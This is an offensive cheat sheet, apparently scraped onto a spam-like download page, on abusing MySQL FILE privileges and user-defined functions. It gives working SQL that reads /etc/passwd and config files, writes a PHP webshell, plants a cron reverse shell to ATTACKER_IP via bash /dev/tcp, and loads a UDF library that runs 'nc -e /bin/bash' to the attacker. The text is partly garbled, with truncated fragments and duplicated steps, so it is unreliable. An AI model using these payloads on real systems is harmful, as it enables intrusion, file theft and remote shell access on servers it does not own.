Mysql Hacktricks Verified Portable [DIRECT]

1. MySQL File Privilege Abuse ( FILE ) Pre-requisite: User has FILE privilege ( GRANT FILE ON *.* ). Verification: SELECT grantee, privilege_type FROM information_schema.user_privileges WHERE privilege_type = 'FILE';

Read Arbitrary Files SELECT LOAD_FILE('/etc/passwd'); SELECT LOAD_FILE('/var/www/html/config.php');

Limitation: File must be readable by mysql OS user, absolute path required.

Write Webshell SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; mysql hacktricks verified

Limitation: Cannot overwrite existing files. Use INTO DUMPFILE for binary writes.

Write Linux Cron / SSH Key SELECT "* * * * * root bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" INTO OUTFILE '/etc/cron.d/reverse';

Needs: Write access to /etc/cron.d/ (rare). Write Webshell SELECT '<

2. MySQL User Defined Functions (UDF) Exploitation Pre-requisite: FILE privilege + ability to write to MySQL plugin directory ( @@plugin_dir ). Check plugin dir: SELECT @@plugin_dir;

Attack Steps (Linux) 1. Compile shared library (lib_mysqludf_sys.so) Download from MySQL UDF Exploit or Metasploit: /usr/share/metasploit-framework/data/exploits/mysql/lib_mysqludf_sys_64.so 2. Write binary to plugin dir (hex encoded to bypass restrictions): SELECT 0x7f454c4602... INTO DUMPFILE '/usr/lib/mysql/plugin/udf.so';

(Full hex dump omitted for brevity – generate with xxd -p udf.so | tr -d '\n' ) 3. Create UDF functions: CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so'; CREATE FUNCTION sys_exec RETURNS INT SONAME 'udf.so'; CREATE FUNCTION sys_open RETURNS INT SONAME 'udf.so'; 4. Execute OS commands: SELECT sys_eval(&#39

4. Execute OS commands: SELECT sys_eval('id'); SELECT sys_exec('nc -e /bin/bash ATTACKER_IP 4444');

Windows equivalent: udf.dll → sys_exec('whoami') .